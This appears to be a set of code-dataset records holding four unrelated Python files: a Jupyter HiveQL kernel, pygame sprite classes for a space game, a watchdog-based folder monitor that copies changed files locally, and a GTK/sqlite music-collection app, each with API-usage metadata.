"code-starcoder2", "pt": "13", "api": [{"api_name": "django.conf.urls.url", "line_number": 14, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 15, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 16, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 17, "usage_type": "call"}]} +{"seq_id": "313298044", "text": "import json\nimport logging\nimport traceback\nimport re\nimport os.path\n\nfrom ipykernel.kernelbase import Kernel\nfrom sqlalchemy.exc import OperationalError, ResourceClosedError\n\nfrom .constants import __version__, KERNEL_NAME, CONFIG_FILE\n\nfrom sqlalchemy import *\nimport pandas as pd\nfrom .tool_sql import *\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\n\n\nclass KernelSyntaxError(Exception):\n pass\n\n\nerror_con_not_created = \"\"\"Connection not initialized!\nPlease specify your pyHive configuration like this :\n\n-------------\n$$ url=hive://@:/\n$$ connect_args={\"auth\": \"KERBEROS\",\"kerberos_service_name\": \"hive\"}\n$$ pool_size=5\n$$ max_overflow=10\n\nYOUR SQL REQUEST HERE IF ANY\n-------------\n\n-> if you want to update the current connection, just type it again with another configuration\n-> $$ are mandatory characters that specify that this line is a configuration for this kernel\n\nOther parameters are available such as :\n\n$$ default_limit=50 # -> without this parameter, default_limit is set to 20\n$$ display_mode=be # -> this will display a table with the beginning (b) and end (e) of the SQL response (options are: b, e and be)\n\n\"\"\"\n\n\nclass ConnectionNotCreated(Exception):\n def __init__(self):\n Exception.__init__(self, error_con_not_created)\n\n\nclass HiveQLKernel(Kernel):\n implementation = KERNEL_NAME\n implementation_version = __version__\n banner = 'HiveQL REPL'\n language = \"hiveql\"\n language_info = {\n 'name': 'hive',\n 'codemirror_mode': \"sql\",\n 'pygments_lexer': 'postgresql',\n 'mimetype': 'text/x-hive',\n 'file_extension': '.hiveql',\n }\n last_conn = None\n params = {\n \"default_limit\": 20,\n \"display_mode\": \"be\"\n }\n conf = None\n conf_file = os.path.expanduser(CONFIG_FILE)\n if os.path.isfile(conf_file):\n with open(conf_file, mode='r') as file_hanlde:\n conf = json.load(file_hanlde)\n\n def send_exception(self, e):\n if type(e) in [ConnectionNotCreated]:\n tb = \"\"\n else:\n tb = \"\\n\" + traceback.format_exc()\n return self.send_error(str(e) + tb)\n\n def send_error(self, contents):\n self.send_response(self.iopub_socket, 'stream', {\n 'name': 'stderr',\n 'text': str(contents)\n })\n return {\n 'status': 'error',\n 'execution_count': self.execution_count,\n 'payload': [],\n 'user_expressions': {}\n }\n\n def send_info(self, contents):\n self.send_response(self.iopub_socket, 'stream', {\n 'name': 'stdout',\n 'text': str(contents)\n })\n\n def create_conn(self, url, **kwargs):\n self.send_info(\"create_engine('\" + url + \"', \" + ', '.join(\n [str(k) + '=' + (str(v) if type(v) == str else json.dumps(v)) for k, v in kwargs.items()]) + \")\\n\")\n self.last_conn = create_engine(url, **kwargs)\n self.last_conn.connect()\n self.send_info(\"Connection established to database!\\n\")\n\n def reconfigure(self, params):\n if 'default_limit' in params:\n try:\n self.params['default_limit'] = int(params['default_limit'])\n self.send_info(\"Set display limit to {}\\n\".format(self.params['default_limit']))\n except ValueError as e:\n self.send_exception(e)\n if 'display_mode' in params:\n v = params['display_mode']\n if type(v) == str and v in ['b', 'e', 'be']:\n self.params['display_mode'] = v\n else:\n self.send_error(\"Invalid display_mode, options are b, e and be.\")\n\n def parse_code(self, code):\n req = code.strip()\n\n headers = {}\n sql_req = \"\"\n beginning = True\n for l in req.split('\\n'):\n l = l.strip()\n if l.startswith(\"$$\"):\n if beginning:\n k, v = l.replace(\"$\", \"\").split(\"=\")\n k, v = k.strip(), v.strip()\n if v.startswith('{'):\n v = json.loads(v)\n else:\n try:\n v = int(v)\n except ValueError:\n pass\n headers[k] = v\n else:\n raise KernelSyntaxError(\"Headers starting with %% must be at the beginning of your request.\")\n else:\n beginning = False\n if not l.startswith(\"--\"):\n sql_req += ' ' + l\n\n if self.last_conn is None and not headers and self.conf is not None:\n headers = self.conf # if cells doesn't contain $$ and connection is None, overriding headers with conf data\n\n sql_req = sql_req.strip()\n if sql_req.endswith(';'):\n sql_req = sql_req[:-1]\n\n a = ['default_limit', 'display_mode']\n params, pyhiveconf = {k: v for k, v in headers.items() if k in a}, {k: v for k, v in headers.items() if k not in a}\n\n self.reconfigure(params)\n\n return pyhiveconf, sql_req\n\n def do_execute(self, code, silent, store_history=True, user_expressions=None, allow_stdin=False):\n try:\n pyhiveconf, sql_req = self.parse_code(code)\n\n if 'url' in pyhiveconf:\n self.create_conn(**pyhiveconf)\n\n if self.last_conn is None:\n raise ConnectionNotCreated()\n\n # If code empty\n if not sql_req:\n return {\n 'status': 'ok',\n 'execution_count': self.execution_count,\n 'payload': [],\n 'user_expressions': {}\n }\n sql_req = sql_remove_comment(sql_req)\n sql_validate(sql_req)\n sql_str = sql_rewrite(sql_req, self.params['default_limit'])\n logger.info(\"Running the following HiveQL query: {}\".format(sql_req))\n\n pd.set_option('display.max_colwidth', -1)\n if sql_is_create(sql_req):\n self.last_conn.execute(sql_str)\n self.send_info(\"Table created!\")\n return { 'status': 'ok', 'execution_count': self.execution_count, 'payload': [], 'user_expressions': {} }\n if sql_is_drop(sql_req):\n self.last_conn.execute(sql_str)\n self.send_info(\"Table dropped!\")\n return { 'status': 'ok', 'execution_count': self.execution_count, 'payload': [], 'user_expressions': {} }\n if sql_is_use(sql_req):\n self.last_conn.execute(sql_str)\n self.send_info(\"Database changed!\")\n return { 'status': 'ok', 'execution_count': self.execution_count, 'payload': [], 'user_expressions': {} }\n if sql_is_set_variable(sql_req):\n for s in sql_req.split(\";\"):\n self.last_conn.execute(s.strip())\n self.send_info(\"variables set!\")\n return {'status': 'ok', 'execution_count': self.execution_count, 'payload': [], 'user_expressions': {}}\n\n df = pd.read_sql(sql_str, self.last_conn)\n if sql_is_show(sql_req):\n if sql_is_show_tables(sql_req):\n html = df_to_html(df[df.tab_name.str.contains( extract_show_pattern(sql_req))])\n if sql_is_show_databases(sql_req):\n html = df_to_html(df[df.database_name.str.contains( extract_show_pattern(sql_req))])\n else:\n html = df_to_html(df)\n\n except OperationalError as oe:\n return self.send_error(oe)\n except ResourceClosedError as rce:\n return self.send_error(rce)\n except MultipleQueriesError as e:\n return self.send_error(\"Only one query per cell!\")\n except NotAllowedQueriesError as e:\n return self.send_error(\"only 'select', 'with', 'set property=value', 'create table x.y stored as orc' 'drop table', 'use database', 'show databases', 'show tables', 'describe myTable' statements are allowed\")\n except Exception as e:\n return self.send_exception(e)\n\n # msg_types = https://jupyter-client.readthedocs.io/en/latest/messaging.html?highlight=stream#messages-on-the-iopub-pub-sub-channel\n self.send_response(self.iopub_socket, 'execute_result', {\n \"execution_count\": self.execution_count,\n 'data': {\n \"text/html\": html,\n },\n \"metadata\": {\n \"image/png\": {\n \"width\": 640,\n \"height\": 480,\n },\n }\n })\n\n return {\n 'status': 'ok',\n 'execution_count': self.execution_count,\n 'payload': [],\n 'user_expressions': {}\n }\ndef df_to_html(df):\n #for column in df:\n # if df[column].dtype == 'object':\n # df[column] = df[column].apply(lambda x: x.replace(\"\\n\",\"
\"))\n return df.fillna('NULL').astype(str).to_html(notebook=True)\n\n", "sub_path": "hiveql/kernel.py", "file_name": "kernel.py", "file_ext": "py", "file_size_in_byte": 9107, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "logging.getLogger", "line_number": 16, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 17, "usage_type": "attribute"}, {"api_name": "ipykernel.kernelbase.Kernel", "line_number": 52, "usage_type": "name"}, {"api_name": "constants.KERNEL_NAME", "line_number": 53, "usage_type": "name"}, {"api_name": "constants.__version__", "line_number": 54, "usage_type": "name"}, {"api_name": "os.path.path.expanduser", "line_number": 70, "usage_type": "call"}, {"api_name": "constants.CONFIG_FILE", "line_number": 70, "usage_type": "argument"}, {"api_name": "os.path.path", "line_number": 70, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 70, "usage_type": "name"}, {"api_name": "os.path.path.isfile", "line_number": 71, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 71, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 71, "usage_type": "name"}, {"api_name": "json.load", "line_number": 73, "usage_type": "call"}, {"api_name": "traceback.format_exc", "line_number": 79, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 102, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 134, "usage_type": "call"}, {"api_name": "pandas.set_option", "line_number": 185, "usage_type": "call"}, {"api_name": "pandas.read_sql", "line_number": 204, "usage_type": "call"}, {"api_name": "sqlalchemy.exc.OperationalError", "line_number": 213, "usage_type": "name"}, {"api_name": "sqlalchemy.exc.ResourceClosedError", "line_number": 215, "usage_type": "name"}]} +{"seq_id": "296288927", "text": "import pygame, math\nfrom settings import *\nimport random\n\nclass Spaceship(pygame.sprite.Sprite):\n def __init__(self, game, x, y):\n self.groups = game.all_sprites\n # you can do this in python 3\n super().__init__(self.groups)\n self.game = game\n self.image = pygame.transform.scale(game.player_img, (50, 40))\n # this ori_img is for the rotate rendering if i directly change image from rotated image something weird happen\n self.ori_img = self.image\n self.rect = self.image.get_rect()\n self.vel = pygame.math.Vector2(0, 0)\n self.pos = pygame.math.Vector2(x, y)\n self.rot = 0\n\n def get_keys(self):\n self.rot_speed = 0\n # 마찰력\n self.vel *= 0.996\n keys = pygame.key.get_pressed()\n if keys[pygame.K_LEFT]:\n self.rot_speed = ROT_SPEED\n if keys[pygame.K_RIGHT]:\n self.rot_speed = -ROT_SPEED\n if keys[pygame.K_UP]:\n max = pygame.math.Vector2(MAX_SPEED, 0).rotate(-self.rot-90)\n if self.vel.length() > max.length() :\n self.vel.scale_to_length(MAX_SPEED)\n else:\n self.vel += pygame.math.Vector2(ACC, 0).rotate(-self.rot-90)\n #self.vel += pygame.math.Vector2(ACC, 0).rotate(-self.rot-90)\n if keys[pygame.K_DOWN]:\n self.vel += pygame.math.Vector2(-ACC / 3, 0).rotate(-self.rot-90)\n\n def update(self):\n self.get_keys()\n self.rot = (self.rot + self.rot_speed * self.game.dt) % 360\n self.image = pygame.transform.rotozoom(self.ori_img, self.rot, 1)\n self.rect = self.image.get_rect()\n self.pos += self.vel * self.game.dt\n self.rect.center = self.pos\n\nclass Planet(pygame.sprite.Sprite):\n def __init__(self, game, image, x, y, rot_speed, width, height):\n # too much things to optimize here..\n self.groups = game.all_sprites\n super().__init__(self.groups)\n self.game = game\n self.image = pygame.transform.scale(image, (width, height))\n self.ori_img = self.image\n self.rect = self.image.get_rect()\n self.rect.centerx = x\n self.rect.centery = y\n self.rot = 0\n self.rot_speed = rot_speed\n self.pos = pygame.math.Vector2(x, y)\n\n def update(self):\n self.ori_rect = self.rect\n self.rot = (self.rot + self.rot_speed * self.game.dt) % 360\n self.image = pygame.transform.rotate(self.ori_img, self.rot)\n self.rect = self.image.get_rect()\n self.rect.center = self.ori_rect.center\n\nclass Planet_orbit(pygame.sprite.Sprite):\n # planet that orbit to other planet\n def __init__(self, game, image, rot_speed, width, height, orbit_to, orbit_speed, distance_to, theta):\n # too much things to optimize here..\n self.groups = game.all_sprites\n super().__init__(self.groups)\n self.game = game\n self.image = pygame.transform.scale(image, (width, height))\n self.ori_img = self.image\n self.rect = self.image.get_rect()\n self.rot = 0\n self.rot_speed = rot_speed\n self.orbit_to = orbit_to\n self.orbit_speed = orbit_speed\n self.radius = distance_to\n self.theta = theta\n\n def update(self):\n self.ori_rect = self.rect\n self.rot = (self.rot + self.rot_speed * self.game.dt) % 360\n self.image = pygame.transform.rotate(self.ori_img, self.rot)\n self.rect = self.image.get_rect()\n self.rect.center = self.ori_rect.center\n\n # this code use 삼각함수 to get next x and y position of circle movement\n x = self.radius * math.cos(self.theta) + self.orbit_to.rect.centerx\n y = self.radius * math.sin(self.theta) + self.orbit_to.rect.centery\n self.rect.centerx = x\n self.rect.centery = y\n # have to change theta (angle of trangle to orbit planet)\n self.theta = (self.theta + self.orbit_speed * self.game.dt) % 360\n", "sub_path": "Pygame_Project_Examples/Spacecraft-master/sprites.py", "file_name": "sprites.py", "file_ext": "py", "file_size_in_byte": 3961, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pygame.sprite", "line_number": 5, "usage_type": "attribute"}, {"api_name": "pygame.transform.scale", "line_number": 11, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 11, "usage_type": "attribute"}, {"api_name": "pygame.math.Vector2", "line_number": 15, "usage_type": "call"}, {"api_name": "pygame.math", "line_number": 15, "usage_type": "attribute"}, {"api_name": "pygame.math.Vector2", "line_number": 16, "usage_type": "call"}, {"api_name": "pygame.math", "line_number": 16, "usage_type": "attribute"}, {"api_name": "pygame.key.get_pressed", "line_number": 23, "usage_type": "call"}, {"api_name": "pygame.key", "line_number": 23, "usage_type": "attribute"}, {"api_name": "pygame.K_LEFT", "line_number": 24, "usage_type": "attribute"}, {"api_name": "pygame.K_RIGHT", "line_number": 26, "usage_type": "attribute"}, {"api_name": "pygame.K_UP", "line_number": 28, "usage_type": "attribute"}, {"api_name": "pygame.math.Vector2", "line_number": 29, "usage_type": "call"}, {"api_name": "pygame.math", "line_number": 29, "usage_type": "attribute"}, {"api_name": "pygame.math.Vector2", "line_number": 33, "usage_type": "call"}, {"api_name": "pygame.math", "line_number": 33, "usage_type": "attribute"}, {"api_name": "pygame.K_DOWN", "line_number": 35, "usage_type": "attribute"}, {"api_name": "pygame.math.Vector2", "line_number": 36, "usage_type": "call"}, {"api_name": "pygame.math", "line_number": 36, "usage_type": "attribute"}, {"api_name": "pygame.transform.rotozoom", "line_number": 41, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 41, "usage_type": "attribute"}, {"api_name": "pygame.sprite", "line_number": 46, "usage_type": "attribute"}, {"api_name": "pygame.transform.scale", "line_number": 52, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 52, "usage_type": "attribute"}, {"api_name": "pygame.math.Vector2", "line_number": 59, "usage_type": "call"}, {"api_name": "pygame.math", "line_number": 59, "usage_type": "attribute"}, {"api_name": "pygame.transform.rotate", "line_number": 64, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 64, "usage_type": "attribute"}, {"api_name": "pygame.sprite", "line_number": 68, "usage_type": "attribute"}, {"api_name": "pygame.transform.scale", "line_number": 75, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 75, "usage_type": "attribute"}, {"api_name": "pygame.transform.rotate", "line_number": 88, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 88, "usage_type": "attribute"}, {"api_name": "math.cos", "line_number": 93, "usage_type": "call"}, {"api_name": "math.sin", "line_number": 94, "usage_type": "call"}]} +{"seq_id": "534998776", "text": "# -*- coding: euc-kr -*-\r\n\r\nimport time, os, datetime, configparser, shutil\r\nfrom watchdog.observers import Observer\r\nfrom watchdog.events import FileSystemEventHandler\r\n\r\nclass MyHandler(FileSystemEventHandler):\r\n target_file_types = []\r\n cp_dir_src = \".\"\r\n cp_dir_dest = \".\"\r\n\r\n def __init__(self, a, b, c):\r\n target_file_types, cp_dir_src, cp_dir_dest = a, b, c\r\n print(\"-------Event Handler Start!!----------\")\r\n\r\n def on_modified(self, event):\r\n print(\"[+] Files are Modified in the Target Folder !!!\")\r\n print(\" L___\", event.event_type, event.src_path)\r\n\r\n self.do_action(event)\r\n\r\n def on_created(self, event):\r\n print(\"[+] Files are Created in the Target Folder !!!\")\r\n print(\" L___\", event.event_type, event.src_path)\r\n\r\n self.do_action(event)\r\n\r\n def get_current_time(self):\r\n ts_rule = \"%Y-%m-%d %H-%M-%S\"\r\n ts = time.time()\r\n st = datetime.datetime.fromtimestamp(ts).strftime(ts_rule)\r\n return st\r\n\r\n def get_fileinfo_from_fullpath(self, full_path):\r\n file_path, file_ext = os.path.splitext(full_path)\r\n file_name = os.path.basename(full_path)\r\n return file_path, file_name, file_ext\r\n\r\n def copy_file(self, src, dest_dir):\r\n str_time = self.get_current_time()\r\n dest_dir = dest_dir + '/' + str_time\r\n\r\n file_path, file_ext = os.path.splitext(src)\r\n file_name = os.path.basename(src)\r\n dest_path = dest_dir + '/' + file_name\r\n\r\n if not os.path.isdir(dest_dir):\r\n try:\r\n os.mkdir(dest_dir)\r\n except:\r\n os.mkdir('/'.join(dest_dir.split('/')[:-1]))\r\n os.mkdir(dest_dir)\r\n\r\n shutil.copyfile(src, dest_path)\r\n\r\n def do_action(self, event):\r\n file_path, file_name, file_ext = self.get_fileinfo_from_fullpath(event.src_path)\r\n print(\" L___path:%s, name:%s, ext:%s\\n\" % (file_path, file_name, file_ext))\r\n\r\n for ext in target_file_types:\r\n if ext == file_ext[1:]:\r\n print(' [+] type:%s, Infected !! Copying info.' % ext)\r\n try:\r\n self.copy_file(event.src_path, cp_dir_dest)\r\n except:\r\n temp = event.src_path.split('\\\\')\r\n temp[0] += '_copy/' + self.get_current_time()\r\n temp = (\"/\".join(temp))\r\n os.mkdir(temp)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n config = configparser.RawConfigParser()\r\n config.read('filemon.cfg')\r\n\r\n target_dir = config.get('Basic_Config', 'target_dir')\r\n temp_target_file_types = config.get('Basic_Config', 'target_file_types')\r\n cp_dir_src = config.get('Basic_Config', 'copy_src_dir')\r\n cp_dir_dest = config.get('Basic_Config', 'copy_dest_dir')\r\n target_file_types = temp_target_file_types.split(\"|\")\r\n\r\n print (\"Monitoring Start - target_dir : %s\" % target_dir)\r\n print (\"target_file_type : %s\" % target_file_types[0])\r\n\r\n event_handler = MyHandler(target_file_types, cp_dir_src, cp_dir_dest)\r\n\r\n observer = Observer()\r\n observer.schedule(event_handler, path=target_dir, recursive=False)\r\n observer.start()\r\n\r\n try:\r\n while True:\r\n time.sleep(1)\r\n except KeyboardInterrupt:\r\n observer.stop()\r\n observer.join()\r\n", "sub_path": "monitor_1.py", "file_name": "monitor_1.py", "file_ext": "py", "file_size_in_byte": 3335, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "watchdog.events.FileSystemEventHandler", "line_number": 7, "usage_type": "name"}, {"api_name": "time.time", "line_number": 30, "usage_type": "call"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 31, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 31, "usage_type": "attribute"}, {"api_name": "os.path.splitext", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path", "line_number": 35, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path", "line_number": 36, "usage_type": "attribute"}, {"api_name": "os.path.splitext", "line_number": 43, "usage_type": "call"}, {"api_name": "os.path", "line_number": 43, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 44, "usage_type": "call"}, {"api_name": "os.path", "line_number": 44, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 47, "usage_type": "call"}, {"api_name": "os.path", "line_number": 47, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 49, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 51, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 52, "usage_type": "call"}, {"api_name": "shutil.copyfile", "line_number": 54, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 69, "usage_type": "call"}, {"api_name": "configparser.RawConfigParser", "line_number": 73, "usage_type": "call"}, {"api_name": "watchdog.observers.Observer", "line_number": 87, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 93, "usage_type": "call"}]} +{"seq_id": "503407162", "text": "import gi\ngi.require_version('Gtk', '3.0')\nfrom gi.repository import Gtk\n\nimport sqlite3\n\n\nclass Music(Gtk.Window):\n def __init__(self):\n Gtk.Window.__init__(self, title = \"Music\")\n\n self.art = []\n self.alb = []\n self.tra = []\n\n self.set_default_size(800,600)\n self.grid = Gtk.Grid()\n self.grid.set_row_spacing(10)\n self.grid.set_column_spacing(10)\n self.add(self.grid)\n\n self.hb = Gtk.HeaderBar()\n self.hb.set_show_close_button(True)\n self.hb.props.title = \"Records\"\n self.set_titlebar(self.hb)\n\n self.artists = Gtk.Box(spacing = 5)\n self.artists.set_size_request(50,50)\n self.grid.add(self.artists)\n self.load_artists()\n\n self.albums = Gtk.ListBox()\n self.grid.attach_next_to(self.albums, self.artists, Gtk.PositionType.BOTTOM,40,50)\n\n self.tracks = Gtk.ListBox()\n self.grid.attach_next_to(self.tracks, self.albums, Gtk.PositionType.RIGHT, 40,50)\n\n\n buttadd = Gtk.Button(label = \"+\")\n buttadd.connect(\"clicked\", self.newcd)\n self.hb.pack_end(buttadd)\n\n buttdel = Gtk.Button(label = \"-\")\n buttdel.connect(\"clicked\", self.delete)\n self.hb.pack_end(buttdel)\n\n buttupdate = Gtk.Button(label = \"Update\")\n buttupdate.connect(\"clicked\", self.update)\n self.hb.pack_end(buttupdate)\n\n buttrent = Gtk.Button(label = \"Rent\")\n buttrent.connect(\"clicked\", self.rent)\n self.hb.pack_end(buttrent)\n\n buttsearch = Gtk.Button(label = \"Search\")\n buttsearch.connect(\"clicked\", self.search)\n self.hb.pack_end(buttsearch)\n\n self.entrysearch = Gtk.Entry()\n self.hb.pack_end(self.entrysearch)\n\n def add_(self, widget):\n addArtysta = self.entry1.get_text()\n addAlbum = self.entry2.get_text()\n addTracks = self.entry3.get_text()\n\n self.cur.execute('INSERT INTO artysta(nazwa) VALUES(?)', (addArtysta,))\n self.cur.execute('INSERT INTO album(nazwa, art) VALUES(?, ?)', (addAlbum, addArtysta,))\n self.cur.execute('INSERT INTO track(tr, nazwa, art) VALUES(?, ?, ?)', (addTracks, addAlbum, addTracks,))\n self.c.commit()\n self.cur.execute('SELECT * FROM artysta')\n ex = self.cur.fetchall()\n bu = Gtk.Button(label = addArtysta)\n bu.connect(\"clicked\", self.load_albums)\n self.artists.add(bu)\n self.show_all()\n\n def load_artists(self):\n self.c = sqlite3.connect('base.db')\n self.c.row_factory = sqlite3.Row\n self.cur = self.c.cursor()\n\n self.cur.execute(\"CREATE TABLE IF NOT EXISTS artysta(nazwa TEXT)\" )\n self.cur.execute(\"CREATE TABLE IF NOT EXISTS album(nazwa TEXT, art TEXT, FOREIGN KEY(art) REFERENCES artysta(nazwa))\" )\n self.cur.execute(\"CREATE TABLE IF NOT EXISTS track(tr TEXT, nazwa TEXT, art TEXT, FOREIGN KEY(art) REFERENCES artysta(nazwa), FOREIGN KEY(nazwa) REFERENCES album(nazwa))\" )\n\n self.c.commit()\n self.cur.execute('SELECT * FROM artysta')\n artists_list = self.cur.fetchall()\n\n for artist_ in artists_list:\n b = Gtk.Button(label = artist_['nazwa'])\n b.connect(\"clicked\", self.load_albums)\n self.art.append(b)\n\n for i in (self.art):\n self.artists.pack_start(i, True, True, 0)\n self.show_all()\n\n def load_albums(self, widget):\n self.albums = Gtk.ListBox()\n self.grid.attach_next_to(self.albums, self.artists, Gtk.PositionType.BOTTOM,30,50)\n self.tracks = Gtk.ListBox()\n self.grid.attach_next_to(self.tracks, self.albums, Gtk.PositionType.RIGHT, 50,50)\n self.cur.execute('SELECT * FROM album WHERE art = ?', (widget.get_label(), ))\n albums_list = self.cur.fetchall()\n for album_ in albums_list:\n b2 = Gtk.Button(label = album_['nazwa'])\n b2.connect(\"clicked\", self.load_tracks)\n self.albums.add(b2)\n self.show_all()\n\n def load_tracks(self, widget):\n self.tracks = Gtk.ListBox()\n self.grid.attach_next_to(self.tracks, self.albums, Gtk.PositionType.RIGHT, 50,50)\n self.cur.execute('SELECT * FROM track WHERE nazwa = ? ', (widget.get_label(), ))\n tracks_list = self.cur.fetchall()\n for track_ in tracks_list:\n l = Gtk.Label(track_['tr'])\n self.tracks.add(l)\n self.show_all()\n\n def newcd(self, widget):\n window2 = CDadd()\n window2.show_all()\n self.show_all()\n\n def delete(self, widget):\n window3 = CDdelete()\n window3.show_all()\n self.show_all()\n\n def update(self, widget):\n window4 = CDupdate()\n window4.show_all()\n self.show_all()\n\n def rent(self, widget):\n window4 = CDrent()\n window4.show_all()\n self.show_all()\n\n def search(self, widget):\n self.albums = Gtk.ListBox()\n self.grid.attach_next_to(self.albums, self.artists, Gtk.PositionType.BOTTOM,30,50)\n self.tracks = Gtk.ListBox()\n self.grid.attach_next_to(self.tracks, self.albums, Gtk.PositionType.RIGHT, 50,50)\n self.cur.execute('SELECT * FROM album WHERE nazwa = ?', (self.entrysearch.get_text(), ))\n albums_list = self.cur.fetchall()\n for album_ in albums_list:\n b2 = Gtk.Button(label = album_['nazwa'])\n b2.connect(\"clicked\", self.load_tracks)\n self.albums.add(b2)\n self.show_all()\n\nclass CDadd(Gtk.Window):\n def __init__(self):\n\n Gtk.Window.__init__(self, title = \"Add\")\n\n self.set_default_size(200,300)\n self.grid = Gtk.Grid()\n self.grid.set_row_spacing(2)\n self.grid.set_column_spacing(2)\n self.add(self.grid)\n\n self.entry1 = Gtk.Entry()\n self.entry2 = Gtk.Entry()\n self.entry3 = Gtk.Entry()\n\n self.grid.attach(self.entry1,0,0,20,20)\n self.grid.attach_next_to(self.entry2, self.entry1, Gtk.PositionType.BOTTOM, 20, 20)\n self.grid.attach_next_to(self.entry3, self.entry2, Gtk.PositionType.BOTTOM, 20, 20)\n\n addbut = Gtk.Button(label = \"Add\")\n addbut.connect(\"clicked\", self.add_)\n self.grid.attach_next_to(addbut, self.entry3, Gtk.PositionType.BOTTOM, 20, 20)\n\n def add_(self, widget):\n\n self.c = sqlite3.connect('base.db')\n self.c.row_factory = sqlite3.Row\n self.cur = self.c.cursor()\n\n addArtysta = self.entry1.get_text()\n addAlbum = self.entry2.get_text()\n self.cur.execute('SELECT * FROM artysta WHERE nazwa = ? ', (addArtysta, ))\n a = self.cur.fetchall()\n if len(a) == 0:\n self.cur.execute('INSERT INTO artysta(nazwa) VALUES(?)', (addArtysta,))\n self.cur.execute('INSERT INTO album(nazwa, art) VALUES(?, ?)', (addAlbum, addArtysta,))\n\n addTracks = self.entry3.get_text()\n addTracks_list = addTracks.split(\"-\")\n for i in addTracks_list:\n self.cur.execute('INSERT INTO track(tr, nazwa, art) VALUES(?, ?, ?)', (i, addAlbum, addArtysta,))\n self.c.commit()\n\nclass CDdelete(Gtk.Window):\n def __init__(self):\n\n Gtk.Window.__init__(self, title = \"Delete\")\n\n self.set_default_size(100,100)\n self.grid = Gtk.Grid()\n self.grid.set_row_spacing(2)\n self.grid.set_column_spacing(2)\n self.add(self.grid)\n\n self.entry1 = Gtk.Entry()\n\n self.grid.add(self.entry1)\n\n addbut = Gtk.Button(label = \"Delete\")\n addbut.connect(\"clicked\", self.del_)\n self.grid.attach_next_to(addbut, self.entry1, Gtk.PositionType.BOTTOM, 20, 20)\n\n def del_(self, widget):\n\n self.c = sqlite3.connect('base.db')\n self.c.row_factory = sqlite3.Row\n self.cur = self.c.cursor()\n\n delAlbum = self.entry1.get_text()\n self.cur.execute('DELETE FROM track WHERE nazwa=?', (delAlbum,))\n self.cur.execute('DELETE FROM album WHERE nazwa=?', (delAlbum,))\n self.c.commit()\n\nclass CDupdate(Gtk.Window):\n def __init__(self):\n\n Gtk.Window.__init__(self, title = \"Delete\")\n\n self.set_default_size(200,200)\n self.grid = Gtk.Grid()\n self.grid.set_row_spacing(2)\n self.grid.set_column_spacing(2)\n self.add(self.grid)\n\n self.entry1 = Gtk.Entry()\n self.entry2 = Gtk.Entry()\n self.grid.attach(self.entry1,0,0,20,20)\n self.grid.attach_next_to(self.entry2,self.entry1, Gtk.PositionType.BOTTOM,20,20)\n\n addbut = Gtk.Button(label = \"Update\")\n addbut.connect(\"clicked\", self.update_)\n self.grid.attach_next_to(addbut, self.entry2, Gtk.PositionType.BOTTOM, 20, 20)\n\n def update_(self, widget):\n\n self.c = sqlite3.connect('base.db')\n self.c.row_factory = sqlite3.Row\n self.cur = self.c.cursor()\n\n updateAlbum = self.entry1.get_text()\n updateAlbumT = self.entry2.get_text()\n self.cur.execute('UPDATE track SET nazwa=? WHERE nazwa=?', (updateAlbumT, updateAlbum,))\n self.cur.execute('UPDATE album SET nazwa=? WHERE nazwa=?', (updateAlbumT, updateAlbum,))\n self.c.commit()\n\nclass CDrent(Gtk.Window):\n def __init__(self):\n\n Gtk.Window.__init__(self, title = \"Rent\")\n\n self.set_default_size(200,200)\n self.grid = Gtk.Grid()\n self.grid.set_row_spacing(2)\n self.grid.set_column_spacing(2)\n self.add(self.grid)\n\n self.entry1 = Gtk.Entry()\n self.grid.attach(self.entry1,0,0,20,20)\n\n addbut = Gtk.Button(label = \"Update\")\n addbut.connect(\"clicked\", self.rent_)\n self.grid.attach_next_to(addbut, self.entry1, Gtk.PositionType.BOTTOM, 20, 20)\n\n def rent_(self, widget):\n\n self.c = sqlite3.connect('base.db')\n self.c.row_factory = sqlite3.Row\n self.cur = self.c.cursor()\n\n updateAlbum = self.entry1.get_text()\n updateAlbumT = updateAlbum + \"(wypozyczone)\"\n self.cur.execute('UPDATE track SET nazwa=? WHERE nazwa=?', (updateAlbumT, updateAlbum,))\n self.cur.execute('UPDATE album SET nazwa=? WHERE nazwa=?', (updateAlbumT, updateAlbum,))\n self.c.commit()\n\nwindow = Music()\nwindow.connect(\"delete-event\", Gtk.main_quit)\nwindow.show_all()\nGtk.main()\n", "sub_path": "Python Rozszerzony/L8/PRL8Z2.py", "file_name": "PRL8Z2.py", "file_ext": "py", "file_size_in_byte": 10195, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "gi.require_version", "line_number": 2, "usage_type": "call"}, {"api_name": "gi.repository.Gtk.Window", 